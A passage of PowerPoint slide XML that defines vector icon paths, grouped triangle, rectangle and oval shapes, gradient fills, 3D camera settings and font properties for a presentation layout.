                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
